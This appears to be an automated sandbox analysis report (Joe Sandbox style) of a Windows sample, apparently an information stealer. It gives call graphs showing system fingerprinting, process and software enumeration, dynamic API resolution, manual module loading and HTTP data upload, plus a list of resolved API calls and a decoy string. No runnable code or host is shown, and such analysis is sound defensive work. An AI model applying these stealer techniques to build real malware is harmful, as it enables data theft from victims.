14896->14897 14898 c5a9b0 4 API calls 14897->14898 14899 c52100 14898->14899 14900 c5a8a0 lstrcpy 14899->14900 14901 c52109 14900->14901 15505 c57e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14901->15505 14904 c5a9b0 4 API calls 14905 c52129 14904->14905 14906 c5a8a0 lstrcpy 14905->14906 14907 c52132 14906->14907 14908 c5a9b0 4 API calls 14907->14908 14909 c52151 14908->14909 14910 c5a8a0 lstrcpy 14909->14910 14911 c5215a 14910->14911 14912 c5a9b0 4 API calls 14911->14912 14913 c5217b 14912->14913 14914 c5a8a0 lstrcpy 14913->14914 14915 c52184 14914->14915 15509 c57f60 14915->15509 14918 c5a9b0 4 API calls 14919 c521a4 14918->14919 14920 c5a8a0 lstrcpy 14919->14920 14921 c521ad 14920->14921 14922 c5a9b0 4 API calls 14921->14922 14923 c521cc 14922->14923 14924 c5a8a0 lstrcpy 14923->14924 14925 c521d5 14924->14925 14926 c5a9b0 4 API calls 14925->14926 14927 c521f6 14926->14927 14928 c5a8a0 lstrcpy 14927->14928 14929 c521ff 14928->14929 15522 c57ed0 GetSystemInfo wsprintfA 14929->15522 14932 c5a9b0 4 API calls 14933 c5221f 14932->14933 14934 c5a8a0 lstrcpy 14933->14934 14935 c52228 14934->14935 14936 c5a9b0 4 API calls 14935->14936 14937 c52247 14936->14937 14938 c5a8a0 lstrcpy 14937->14938 14939 c52250 14938->14939 14940 c5a9b0 4 API calls 14939->14940 14941 c52270 14940->14941 14942 c5a8a0 lstrcpy 14941->14942 14943 c52279 14942->14943 15524 c58100 GetProcessHeap RtlAllocateHeap 14943->15524 14946 c5a9b0 4 API calls 14947 c52299 14946->14947 14948 c5a8a0 lstrcpy 14947->14948 14949 c522a2 14948->14949 14950 c5a9b0 4 API calls 14949->14950 14951 c522c1 14950->14951 14952 c5a8a0 lstrcpy 14951->14952 14953 c522ca 14952->14953 14954 c5a9b0 4 API calls 14953->14954 14955 c522eb 14954->14955 14956 c5a8a0 lstrcpy 14955->14956 14957 c522f4 14956->14957 15530 c587c0 14957->15530 14960 c5a920 3 API calls 14961 c5231e 14960->14961 14962 c5a8a0 lstrcpy 14961->14962 14963 c52327 14962->14963 14964 c5a9b0 4 API calls 14963->14964 14965 c52351 14964->14965 14966 c5a8a0 lstrcpy 14965->14966 14967 c5235a 14966->14967 14968 c5a9b0 4 API calls 14967->14968 14969 c5237a 14968->14969 14970 c5a8a0 lstrcpy 14969->14970 14971 c52383 14970->14971 14972 c5a9b0 4 API calls 14971->14972 14973 c523a2 14972->14973 14974 c5a8a0 lstrcpy 14973->14974 14975 c523ab 14974->14975 15535 c581f0 14975->15535 14977 c523c2 14978 c5a920 3 API calls 14977->14978 14979 c523d5 14978->14979 14980 c5a8a0 lstrcpy 14979->14980 14981 c523de 14980->14981 14982 c5a9b0 4 API calls 14981->14982 14983 c5240a 14982->14983 14984 c5a8a0 lstrcpy 14983->14984 14985 c52413 14984->14985 14986 c5a9b0 4 API calls 14985->14986 14987 c52432 14986->14987 14988 c5a8a0 lstrcpy 14987->14988 14989 c5243b 14988->14989 14990 c5a9b0 4 API calls 14989->14990 14991 c5245c 14990->14991 14992 c5a8a0 lstrcpy 14991->14992 14993 c52465 14992->14993 14994 c5a9b0 4 API calls 14993->14994 14995 c52484 14994->14995 14996 c5a8a0 lstrcpy 14995->14996 14997 c5248d 14996->14997 14998 c5a9b0 4 API calls 14997->14998 14999 c524ae 14998->14999 15000 c5a8a0 lstrcpy 14999->15000 15001 c524b7 15000->15001 15543 c58320 15001->15543 15003 c524d3 15004 c5a920 3 API calls 15003->15004 15005 c524e6 15004->15005 15006 c5a8a0 lstrcpy 15005->15006 15007 c524ef 15006->15007 15008 c5a9b0 4 API calls 15007->15008 15009 c52519 15008->15009 15010 c5a8a0 lstrcpy 15009->15010 15011 c52522 15010->15011 15012 c5a9b0 4 API calls 15011->15012 15013 c52543 15012->15013 15014 c5a8a0 lstrcpy 15013->15014 15015 c5254c 15014->15015 15016 c58320 17 API calls 15015->15016 15017 c52568 15016->15017 15018 c5a920 3 API calls 15017->15018 15019 c5257b 15018->15019 15020 c5a8a0 lstrcpy 15019->15020 15021 c52584 15020->15021 15022 c5a9b0 4 API calls 15021->15022 15023 c525ae 15022->15023 15024 c5a8a0 lstrcpy 15023->15024 15025 c525b7 15024->15025 15026 c5a9b0 4 API calls 15025->15026 15027 c525d6 15026->15027 15028 c5a8a0 lstrcpy 15027->15028 15029 c525df 15028->15029 15030 c5a9b0 4 API calls 15029->15030 15031 c52600 15030->15031 15032 c5a8a0 lstrcpy 15031->15032 15033 c52609 15032->15033 15579 c58680 15033->15579 15035 c52620 15036 c5a920 3 API calls 15035->15036 15037 c52633 15036->15037 15038 c5a8a0 lstrcpy 15037->15038 15039 c5263c 15038->15039 15040 c5265a lstrlen 15039->15040 15041 c5266a 15040->15041 15042 c5a740 lstrcpy 15041->15042 15043 c5267c 15042->15043 15044 c41590 lstrcpy 15043->15044 15045 c5268d 15044->15045 15589 c55190 15045->15589 15047 c52699 15047->13479 15777 c5aad0 15048->15777 15050 c45009 InternetOpenUrlA 15054 c45021 15050->15054 15051 c450a0 InternetCloseHandle InternetCloseHandle 15053 c450ec 15051->15053 15052 c4502a InternetReadFile 15052->15054 15053->13483 15054->15051 15054->15052 15778 c498d0 15055->15778 15057 c50759 15058 c5077d 15057->15058 15059 c50a38 15057->15059 15062 c50799 StrCmpCA 15058->15062 15060 c41590 lstrcpy 15059->15060 15061 c50a49 15060->15061 15954 c50250 15061->15954 15064 c507a8 15062->15064 15090 c50843 15062->15090 15066 c5a7a0 lstrcpy 15064->15066 15068 c507c3 15066->15068 15067 c50865 StrCmpCA 15069 c50874 15067->15069 15071 c5096b 15067->15071 15070 c41590 lstrcpy 15068->15070 15072 c5a740 lstrcpy 15069->15072 15073 c5080c 15070->15073 15074 c5099c StrCmpCA 15071->15074 15075 c50881 15072->15075 15076 c5a7a0 lstrcpy 15073->15076 15077 c50a2d 15074->15077 15078 c509ab 15074->15078 15079 c5a9b0 4 API calls 15075->15079 15080 c50823 15076->15080 15077->13487 15081 c41590 lstrcpy 15078->15081 15082 c508ac 15079->15082 15083 c5a7a0 lstrcpy 15080->15083 15085 c509f4 15081->15085 15086 c5a920 3 API calls 15082->15086 15084 c5083e 15083->15084 15781 c4fb00 15084->15781 15088 c5a7a0 lstrcpy 15085->15088 15089 c508b3 15086->15089 15091 c50a0d 15088->15091 15092 c5a9b0 4 API calls 15089->15092 15090->15067 15093 c5a7a0 lstrcpy 15091->15093 15094 c508ba 15092->15094 15095 c50a28 15093->15095 15096 c5a8a0 lstrcpy 15094->15096 15897 c50030 15095->15897 15429 c5a7a0 lstrcpy 15428->15429 15430 c41683 15429->15430 15431 c5a7a0 lstrcpy 15430->15431 15432 c41695 15431->15432 15433 c5a7a0 lstrcpy 15432->15433 15434 c416a7 15433->15434 15435 c5a7a0 lstrcpy 15434->15435 15436 c415a3 15435->15436 15436->14310 15438 c447c6 15437->15438 15439 c44838 lstrlen 15438->15439 15463 c5aad0 15439->15463 15441 c44848 InternetCrackUrlA 15442 c44867 15441->15442 15442->14387 15444 c5a740 lstrcpy 15443->15444 15445 c58b74 15444->15445 15446 c5a740 lstrcpy 15445->15446 15447 c58b82 GetSystemTime 15446->15447 15449 c58b99 15447->15449 15448 c5a7a0 lstrcpy 15450 c58bfc 15448->15450 15449->15448 15450->14402 15452 c5a931 15451->15452 15453 c5a988 15452->15453 15455 c5a968 lstrcpy lstrcat 15452->15455 15454 c5a7a0 lstrcpy 15453->15454 15456 c5a994 15454->15456 15455->15453 15456->14405 15457->14520 15459 c49af9 LocalAlloc 15458->15459 15460 c44eee 15458->15460 15459->15460 15461 c49b14 CryptStringToBinaryA 15459->15461 15460->14408 15460->14410 15461->15460 15462 c49b39 LocalFree 15461->15462 15462->15460 15463->15441 15464->14530 15465->14671 15466->14673 15467->14681 15596 c577a0 15468->15596 15471 c576c6 RegOpenKeyExA 15473 c57704 RegCloseKey 15471->15473 15474 c576e7 RegQueryValueExA 15471->15474 15472 c51c1e 15472->14763 15473->15472 15474->15473 15476 c51c99 15475->15476 15476->14777 15478 c51e09 15477->15478 15478->14819 15480 c51e84 15479->15480 15481 c57a9a wsprintfA 15479->15481 15480->14833 15481->15480 15483 c57b4d 15482->15483 15484 c51efe 15482->15484 15603 c58d20 LocalAlloc CharToOemW 15483->15603 15484->14847 15487 c5a740 lstrcpy 15486->15487 15488 c57bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15487->15488 15497 c57c25 15488->15497 15489 c57c46 GetLocaleInfoA 15489->15497 15490 c57d18 15491 c57d1e LocalFree 15490->15491 15492 c57d28 15490->15492 15491->15492 15494 c5a7a0 lstrcpy 15492->15494 15493 c5a9b0 lstrcpy lstrlen lstrcpy lstrcat 15493->15497 15496 c57d37 15494->15496 15495 c5a8a0 lstrcpy 15495->15497 15496->14860 15497->15489 15497->15490 15497->15493 15497->15495 15499 c52008 15498->15499 15499->14875 15501 c594b5 15500->15501 15502 c59493 GetModuleFileNameExA CloseHandle 15500->15502 15503 c5a740 lstrcpy 15501->15503 15502->15501 15504 c52091 15503->15504 15504->14890 15506 c52119 15505->15506 15507 c57e68 RegQueryValueExA 15505->15507 15506->14904 15508 c57e8e RegCloseKey 15507->15508 15508->15506 15510 c57fb9 GetLogicalProcessorInformationEx 15509->15510 15511 c57fd8 GetLastError 15510->15511 15512 c58029 15510->15512 15514 c58022 15511->15514 15521 c57fe3 15511->15521 15517 c589f0 2 API calls 15512->15517 15515 c52194 15514->15515 15518 c589f0 2 API calls 15514->15518 15515->14918 15519 c5807b 15517->15519 15518->15515 15519->15514 15520 c58084 wsprintfA 15519->15520 15520->15515 15521->15510 15521->15515 15604 c589f0 15521->15604 15607 c58a10 GetProcessHeap RtlAllocateHeap 15521->15607 15523 c5220f 15522->15523 15523->14932 15525 c589b0 15524->15525 15526 c5814d GlobalMemoryStatusEx 15525->15526 15527 c58163 __aulldiv 15526->15527 15528 c5819b wsprintfA 15527->15528 15529 c52289 15528->15529 15529->14946 15531 c587fb GetProcessHeap RtlAllocateHeap wsprintfA 15530->15531 15533 c5a740 lstrcpy 15531->15533 15534 c5230b 15533->15534 15534->14960 15536 c5a740 lstrcpy 15535->15536 15537 c58229 15536->15537 15538 c58263 15537->15538 15541 c5a9b0 lstrcpy lstrlen lstrcpy lstrcat 15537->15541 15542 c5a8a0 lstrcpy 15537->15542 15539 c5a7a0 lstrcpy 15538->15539 15540 c582dc 15539->15540 15540->14977 15541->15537 15542->15537 15544 c5a740 lstrcpy 15543->15544 15545 c5835c RegOpenKeyExA 15544->15545 15546 c583d0 15545->15546 15547 c583ae 15545->15547 15549 c58613 RegCloseKey 15546->15549 15550 c583f8 RegEnumKeyExA 15546->15550 15548 c5a7a0 lstrcpy 15547->15548 15560 c583bd 15548->15560 15551 c5a7a0 lstrcpy 15549->15551 15552 c5843f wsprintfA RegOpenKeyExA 15550->15552 15553 c5860e 15550->15553 15551->15560 15554 c58485 RegCloseKey RegCloseKey 15552->15554 15555 c584c1 RegQueryValueExA 15552->15555 15553->15549 15558 c5a7a0 lstrcpy 15554->15558 15556 c58601 RegCloseKey 15555->15556 15557 c584fa lstrlen 15555->15557 15556->15553 15557->15556 15559 c58510 15557->15559 15558->15560 15561 c5a9b0 4 API calls 15559->15561 15560->15003 15562 c58527 15561->15562 15563 c5a8a0 lstrcpy 15562->15563 15564 c58533 15563->15564 15565 c5a9b0 4 API calls 15564->15565 15566 c58557 15565->15566 15567 c5a8a0 lstrcpy 15566->15567 15568 c58563 15567->15568 15569 c5856e RegQueryValueExA 15568->15569 15569->15556 15570 c585a3 15569->15570 15571 c5a9b0 4 API calls 15570->15571 15572 c585ba 15571->15572 15573 c5a8a0 lstrcpy 15572->15573 15574 c585c6 15573->15574 15575 c5a9b0 4 API calls 15574->15575 15576 c585ea 15575->15576 15577 c5a8a0 lstrcpy 15576->15577 15578 c585f6 15577->15578 15578->15556 15580 c5a740 lstrcpy 15579->15580 15581 c586bc CreateToolhelp32Snapshot Process32First 15580->15581 15582 c5875d CloseHandle 15581->15582 15583 c586e8 Process32Next 15581->15583 15584 c5a7a0 lstrcpy 15582->15584 15583->15582 15588 c586fd 15583->15588 15587 c58776 15584->15587 15585 c5a9b0 lstrcpy lstrlen lstrcpy lstrcat 15585->15588 15586 c5a8a0 lstrcpy 15586->15588 15587->15035 15588->15583 15588->15585 15588->15586 15590 c5a7a0 lstrcpy 15589->15590 15591 c551b5 15590->15591 15592 c41590 lstrcpy 15591->15592 15593 c551c6 15592->15593 15608 c45100 15593->15608 15595 c551cf 15595->15047 15599 c57720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15596->15599 15598 c576b9 15598->15471 15598->15472 15600 c57765 RegQueryValueExA 15599->15600 15601 c57780 RegCloseKey 15599->15601 15600->15601 15602 c57793 15601->15602 15602->15598 15603->15484 15605 c58a0c 15604->15605 15606 c589f9 GetProcessHeap HeapFree 15604->15606 15605->15521 15606->15605 15607->15521 15609 c5a7a0 lstrcpy 15608->15609 15610 c45119 15609->15610 15611 c447b0 2 API calls 15610->15611 15612 c45125 15611->15612 15768 c58ea0 15612->15768 15614 c45184 15615 c45192 lstrlen 15614->15615 15616 c451a5 15615->15616 15617 c58ea0 4 API calls 15616->15617 15618 c451b6 15617->15618 15619 c5a740 lstrcpy 15618->15619 15620 c451c9 15619->15620 15621 c5a740 lstrcpy 15620->15621 15622 c451d6 15621->15622 15623 c5a740 lstrcpy 15622->15623 15624 c451e3 15623->15624 15625 c5a740 lstrcpy 15624->15625 15626 c451f0 15625->15626 15627 c5a740 lstrcpy 15626->15627 15628 c451fd InternetOpenA StrCmpCA 15627->15628 15629 c4522f 15628->15629 15630 c458c4 InternetCloseHandle 15629->15630 15631 c58b60 3 API calls 15629->15631 15637 c458d9 codecvt 15630->15637 15632 c4524e 15631->15632 15633 c5a920 3 API calls 15632->15633 15634 c45261 15633->15634 15635 c5a8a0 lstrcpy 15634->15635 15636 c4526a 15635->15636 15638 c5a9b0 4 API calls 15636->15638 15641 c5a7a0 lstrcpy 15637->15641 15639 c452ab 15638->15639 15640 c5a920 3 API calls 15639->15640 15642 c452b2 15640->15642 15648 c45913 15641->15648 15643 c5a9b0 4 API calls 15642->15643 15644 c452b9 15643->15644 15645 c5a8a0 lstrcpy 15644->15645 15646 c452c2 15645->15646 15647 c5a9b0 4 API calls 15646->15647 15649 c45303 15647->15649 15648->15595 15650 c5a920 3 API calls 15649->15650 15651 c4530a 15650->15651 15652 c5a8a0 lstrcpy 15651->15652 15653 c45313 15652->15653 15654 c45329 InternetConnectA 15653->15654 15654->15630 15655 c45359 HttpOpenRequestA 15654->15655 15657 c458b7 InternetCloseHandle 15655->15657 15658 c453b7 15655->15658 15657->15630 15659 c5a9b0 4 API calls 15658->15659 15660 c453cb 15659->15660 15661 c5a8a0 lstrcpy 15660->15661 15662 c453d4 15661->15662 15663 c5a920 3 API calls 15662->15663 15664 c453f2 15663->15664 15665 c5a8a0 lstrcpy 15664->15665 15666 c453fb 15665->15666 15667 c5a9b0 4 API calls 15666->15667 15668 c4541a 15667->15668 15669 c5a8a0 lstrcpy 15668->15669 15670 c45423 15669->15670 15671 c5a9b0 4 API calls 15670->15671 15672 c45444 15671->15672 15673 c5a8a0 lstrcpy 15672->15673 15674 c4544d 15673->15674 15675 c5a9b0 4 API calls 15674->15675 15676 c4546e 15675->15676 15677 c5a8a0 lstrcpy 15676->15677 15769 c58ead CryptBinaryToStringA 15768->15769 15770 c58ea9 15768->15770 15769->15770 15771 c58ece GetProcessHeap RtlAllocateHeap 15769->15771 15770->15614 15771->15770 15772 c58ef4 codecvt 15771->15772 15773 c58f05 CryptBinaryToStringA 15772->15773 15773->15770 15777->15050 16020 c49880 15778->16020 15780 c498e1 15780->15057 15782 c5a740 lstrcpy 15781->15782 15783 c4fb16 15782->15783 15955 c5a740 lstrcpy 15954->15955 15956 c50266 15955->15956 15957 c58de0 2 API calls 15956->15957 15958 c5027b 15957->15958 15959 c5a920 3 API calls 15958->15959 15960 c5028b 15959->15960 15961 c5a8a0 lstrcpy 15960->15961 15962 c50294 15961->15962 15963 c5a9b0 4 API calls 15962->15963 15964 c502b8 15963->15964 16021 c4988e 16020->16021 16024 c46fb0 16021->16024 16023 c498ad codecvt 16023->15780 16027 c46d40 16024->16027 16028 c46d59 16027->16028 16029 c46d63 16027->16029 16028->16023 16029->16028 16041 c46660 16029->16041 16031 c46dbe 16031->16028 16047 c469b0 16031->16047 16033 c46e2a 16033->16028 16034 c46ee6 VirtualFree 16033->16034 16035 c46ef7 16033->16035 16034->16035 16036 c46f26 FreeLibrary 16035->16036 16037 c46f38 16035->16037 16040 c46f41 16035->16040 16036->16035 16039 c589f0 2 API calls 16037->16039 16038 c589f0 2 API calls 16038->16028 16039->16040 16040->16028 16040->16038 16044 c4668f VirtualAlloc 16041->16044 16043 c46730 16045 c46743 VirtualAlloc 16043->16045 16046 c4673c 16043->16046 16044->16043 16044->16046 16045->16046 16046->16031 16048 c469c9 16047->16048 16052 c469d5 16047->16052 16049 c46a09 LoadLibraryA 16048->16049 16048->16052 16050 c46a32 16049->16050 16049->16052 16056 c46ae0 16050->16056 16057 c58a10 GetProcessHeap RtlAllocateHeap 16050->16057 16052->16033 16053 c46ba8 GetProcAddress 16053->16052 16053->16056 16054 c589f0 2 API calls 16054->16056 16055 c46a8b 16055->16052 16055->16054 16056->16052 16056->16053 16057->16055

                        Executed Functions

                        Function 00C59860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 660 c59860-c59874 call c59750 663 c59a93-c59af2 LoadLibraryA * 5 660->663 664 c5987a-c59a8e call c59780 GetProcAddress * 21 660->664 666 c59af4-c59b08 GetProcAddress 663->666 667 c59b0d-c59b14 663->667 664->663 666->667 669 c59b46-c59b4d 667->669 670 c59b16-c59b41 GetProcAddress * 2 667->670 671 c59b4f-c59b63 GetProcAddress 669->671 672 c59b68-c59b6f 669->672 670->669 671->672 673 c59b71-c59b84 GetProcAddress 672->673 674 c59b89-c59b90 672->674 673->674 675 c59bc1-c59bc2 674->675 676 c59b92-c59bbc GetProcAddress * 2 674->676 676->675
                        APIs
                        • GetProcAddress.KERNEL32(74DD0000,00894178), ref: 00C598A1
                        • GetProcAddress.KERNEL32(74DD0000,008940E8), ref: 00C598BA
                        • GetProcAddress.KERNEL32(74DD0000,00894130), ref: 00C598D2
                        • GetProcAddress.KERNEL32(74DD0000,008941C0), ref: 00C598EA
                        • GetProcAddress.KERNEL32(74DD0000,008941D8), ref: 00C59903
                        • GetProcAddress.KERNEL32(74DD0000,0089ADE8), ref: 00C5991B
                        • GetProcAddress.KERNEL32(74DD0000,008876D0), ref: 00C59933
                        • GetProcAddress.KERNEL32(74DD0000,008876F0), ref: 00C5994C
                        • GetProcAddress.KERNEL32(74DD0000,00893F98), ref: 00C59964
                        • GetProcAddress.KERNEL32(74DD0000,00893FE0), ref: 00C5997C
                        • GetProcAddress.KERNEL32(74DD0000,00894028), ref: 00C59995
                        • GetProcAddress.KERNEL32(74DD0000,00893FB0), ref: 00C599AD
                        • GetProcAddress.KERNEL32(74DD0000,00887650), ref: 00C599C5
                        • GetProcAddress.KERNEL32(74DD0000,00894058), ref: 00C599DE
                        • GetProcAddress.KERNEL32(74DD0000,00894088), ref: 00C599F6
                        • GetProcAddress.KERNEL32(74DD0000,00887550), ref: 00C59A0E
                        • GetProcAddress.KERNEL32(74DD0000,00894100), ref: 00C59A27
                        • GetProcAddress.KERNEL32(74DD0000,00894118), ref: 00C59A3F
                        • GetProcAddress.KERNEL32(74DD0000,008876B0), ref: 00C59A57
                        • GetProcAddress.KERNEL32(74DD0000,00894160), ref: 00C59A70
                        • GetProcAddress.KERNEL32(74DD0000,00887730), ref: 00C59A88
                        • LoadLibraryA.KERNEL32(00894340,?,00C56A00), ref: 00C59A9A
                        • LoadLibraryA.KERNEL32(00894358,?,00C56A00), ref: 00C59AAB
                        • LoadLibraryA.KERNEL32(00894298,?,00C56A00), ref: 00C59ABD
                        • LoadLibraryA.KERNEL32(008942C8,?,00C56A00), ref: 00C59ACF
                        • LoadLibraryA.KERNEL32(008942E0,?,00C56A00), ref: 00C59AE0
                        • GetProcAddress.KERNEL32(75A70000,00894328), ref: 00C59B02
                        • GetProcAddress.KERNEL32(75290000,008942B0), ref: 00C59B23
                        • GetProcAddress.KERNEL32(75290000,008942F8), ref: 00C59B3B
                        • GetProcAddress.KERNEL32(75BD0000,00894310), ref: 00C59B5D
                        • GetProcAddress.KERNEL32(75450000,008874D0), ref: 00C59B7E
                        • GetProcAddress.KERNEL32(76E90000,0089ACE8), ref: 00C59B9F
                        • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00C59BB6
                        Strings
                        • NtQueryInformationProcess, xrefs: 00C59BAA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001143000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703203377.0000000001144000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703302298.00000000012E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1703315712.00000000012E6000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_c40000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressProc$LibraryLoad
                        • String ID: NtQueryInformationProcess
                        • API String ID: 2238633743-2781105232
                        • Opcode ID: ed781428544aa805ecfe5a3e5d80ce08d9e4eb0c6adeef132ad7a8ab9320a687
                        • Instruction ID: 9459d7f4457c246f83f4e1fd5aa41ec282283444539945193c906e00c9b77dd9
                        • Opcode Fuzzy Hash: ed781428544aa805ecfe5a3e5d80ce08d9e4eb0c6adeef132ad7a8ab9320a687
                        • Instruction Fuzzy Hash: D6A14DB55006009FF358EFAAFD8895637F9F74C70170C453BA60DB3264D63AA44AEB22
                        Function 00C445C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 764 c445c0-c44695 RtlAllocateHeap 781 c446a0-c446a6 764->781 782 c446ac-c4474a 781->782 783 c4474f-c447a9 VirtualProtect 781->783 782->781
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00C4460F
                        • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00C4479C
                        Strings
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C44678
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C44643
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C4473F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C44683
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C445C7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C4477B
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C44713
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C446C2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C446B7
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C4466D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C446CD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C446D8
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C44617
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C44729
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C4475A
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C4474F
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C44662
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C445D2
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C44770
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C4471E
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C44765
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C445F3
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C445DD
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C44657
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C446AC
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C44638
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C44622
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C4462D
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C44734
                        • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C445E8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702857750.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                        • Associated: 00000000.00000002.1702844937.0000000000C40000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000D22000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702857750.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000102B000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001106000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.000000000112A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1702986744.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
